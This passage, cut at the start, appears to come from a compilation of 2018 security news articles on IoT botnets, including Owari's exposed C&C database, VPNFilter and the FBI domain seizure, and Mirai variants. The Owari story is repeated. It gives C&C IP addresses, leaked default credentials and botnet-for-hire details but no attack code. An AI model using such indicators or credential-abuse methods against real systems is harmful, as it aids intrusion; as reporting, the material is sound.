"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at 80.211.232.43 and 80.211.45.89, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."


FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco's released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported about a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and likely been designed by Russia-baked state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home offices (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-access storage (NAS) devices.


Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other, Talos researchers also found evidence that the VPNFilter source code share code with versions of BlackEnergy—the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.


The seizure of the domain that is part of VPNFilter's command-and-control infrastructure allows the FBI to redirect attempts by stage one of the malware (in an attempt to reinfect the device) to an FBI-controlled server, which will capture the IP address of infected devices and pass on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or having default credentials, users are strongly recommended to change default credentials for their devices to prevent against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it.
If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari botnet used default credentials on their command and control (C&C) server, thus allowing easy access their database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server on IP 80(.)211(.)232(.)43, with port 3306, the default port for MySQL database, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it’s not that easy to make a MySQL database accessible from anywhere, nonetheless to secure it so poorly that anyone can connect to it.

Vess
@VessOnSecurity
4 Jun
It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666 …

Vess
@VessOnSecurity
Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible.

11:08 PM - Jun 4, 2018
See Vess's other Tweets
Twitter Ads info and privacy
Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.

Unfortunately, although they gained write access to the MySQL databases, the researchers couldn’t disrupt the botnet, because C&C-related IPs usually have a short lifespan, as they tend to be flagged fast due to bad network traffic. Thus, they often change the IPs, and the two mentioned above are already offline.

Ankit Anubhav, Principal Researcher, NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that the cost of hiring the botnet is of $60 per month, which involves “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.


Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

IoT ExploitsNetwork performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) published in a recent blog post, describing how each of these botnets start from the basic building blocks of Mirai and add to and sometimes remove from the original Mirai functionality -- adding, says, ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but in making his source code public, Mirai and Mirai variants continue to grow. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017; but this is expected to rise to around 125 billion by 2030 according to a new analysis from IHS Markit. Vendors continue to rush their products in order to get early market share, but often at the cost of built in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
6.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

Owari botnet

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


Experts believe the botmaster of the VPNFilter is attempting to resume the botnet

2.6.2018 securityaffairs BotNet

Experts from security firms GreyNoise Intelligence and JASK and GreyNoise believe that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago security experts and law enforcement bodies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine, fortunately, a prompt action of authorities allowed to take down it.

VPNFilter malware

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, botmasters are attempting to resume the botnet, this is what emerged from the monitoring of the malicious traffic associated with VPNFilter.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts shows threat actors targeting Mikrotik routers on Ukrainian networks with port 2000 exposed online.

The VPNFilter malware is very sophisticated and implements many functionalities used by nation-state malware, such as wipe firmware, communicate via Tor, traffic monitoring, and the ability to target ICS devices.

The US authorities blamed Russia-linked APT28 hacking group for the creation of the botnet, Ukrainian bodies must be vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.


Massive Russia-Linked Botnet Raises Concerns of New Attack on Ukraine
24.5.2018 securityweek  BotNet

Russia-made VPNFilter malware infects 500,000 devices in preparation of new Ukraine attack

Russia may be preparing for another massive cyberattack on Ukraine using a botnet of at least 500,000 compromised routers and network-attached storage (NAS) devices, Cisco’s Talos threat intelligence group reported on Wednesday.

The botnet is powered by a sophisticated piece of malware that researchers have dubbed VPNFilter based on the names of some folders created by the threat. Talos has worked with several other cybersecurity firms and law enforcement agencies to investigate VPNFilter. While the investigation is ongoing, an initial report has been published due to concerns that an attack involving the botnet may be imminent.

Researchers believe a state-sponsored or state-affiliated threat actor is likely behind the attack and Russia has been named the main suspect due to code overlaps with the BlackEnergy malware, which has been attributed by many to the Kremlin.

More than 500,000 hacked devices have been observed across 54 countries, but many infections have been spotted in Ukraine and their number continues to increase. The malware has compromised devices made by Linksys, MikroTik, Netgear, TP-Link and QNAP, and while experts have yet to identify the attack vector they are confident that no zero-day vulnerabilities are involved.

VPNFilter is a modular piece of malware that has a wide range of capabilities. It can intercept data passing through the compromised device, including website credentials, and it can monitor the network for communications over the Modbus SCADA protocol. The malware, which uses Tor to communicate with a control panel, also has destructive capabilities that can be leveraged to make an infected device unusable.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users' devices to cover up their tracks, going much further than simply removing traces of the malware. If it suited their goals, this command could be executed on a broad scale, potentially rendering hundreds of thousands of devices unusable, disabling internet access for hundreds of thousands of victims worldwide or in a focused region where it suited the actor's purposes,” Talos said in its report.

Researchers are concerned that VPNFilter may be used for another massive attack on Ukraine not only due to the large number of infections and a separate command and control (C&C) infrastructure for devices in this country, but also because there are only a few weeks until Ukraine celebrates its Constitution Day.

Last year, the NotPetya wiper attack was launched on the eve of Ukraine’s Constitution Day. NotPetya has been officially attributed to Russia by the U.S. and other countries and researchers have also linked the malware to BlackEnergy.

The fact that the malware monitors Modbus communications, which are typically used for supervisory control and data acquisition (SCADA) systems, suggests that the attacker may also be targeting industrial control systems (ICS).

Threat groups believed to be working for the Russian government have been known to launch attacks on ICS, including on Ukraine’s energy sector back in December 2016 using a piece of malware tracked as Industroyer and CRASHOVERRIDE. There are several other Russia-linked actors that have targeted industrial systems, including Dragonfly and Dymalloy.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor's operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos said.


U.S. Disrupts Russian Botnet of 500,000 Hacked Routers
24.5.2018 securityweek  BotNet

The US Justice Department said Wednesday that it had seized an internet domain that directed a dangerous botnet of a half-million infected home and office network routers, controlled by hackers believed tied to Russian intelligence.

The move was aimed at breaking up an operation deeply embedded in small and medium-sized computer networks that could allow the hackers to take control of computers as well as easily steal data.

The Justice Department said the "VPNFilter" botnet was set up by a hacking group variously called APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group.

The group is blamed for cyber attacks on numerous governments, key infrastructure industries like power grids, the Organization for Security and Co-operation in Europe, the World Anti-Doping Agency, and other bodies.

US intelligence agencies also say it was involved in the operation to hack and release damaging information on the Democratic Party during the 2016 US presidential election, and has engineered a number of computer network disruptions in Ukraine.

"According to cybersecurity researchers, the Sofacy Group is a cyber-espionage group believed to have originated from Russia," the Department of Justice said in a court filing.

"Likely operating since 2007, the group is known to typically target government, military, security organizations, and other targets of intelligence value, through a variety of means," it said.

The Justice filing did not say who was behind Sofacy Group, but US intelligence has in the past linked it to Russia's GRU military intelligence agency, and numerous private computer security groups have made the same connection.

In Wednesday's action, the Justice Department said it had obtained a warrant authorizing the FBI to seize a computer domain that is part of the command and control system of the VPNFilter botnet.

The botnet targets home and office routers, through which it can relay orders from the botnet's controllers and intercept and reroute traffic back to them, virtually undetected by the users of a network.

In a report released in parallel to the Justice announcement, network equipment giant Cisco said VPNFilter had infected at least 500,000 devices in at least 54 countries.

It has targeted popular router brands like Linksys, MikroTik, NETGEAR and TP-Link.

"The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials," Cisco said.

It also has "a destructive capacity that can render an infected device unusable, which can be triggered on individual victim machines or en masse."

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VNPFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.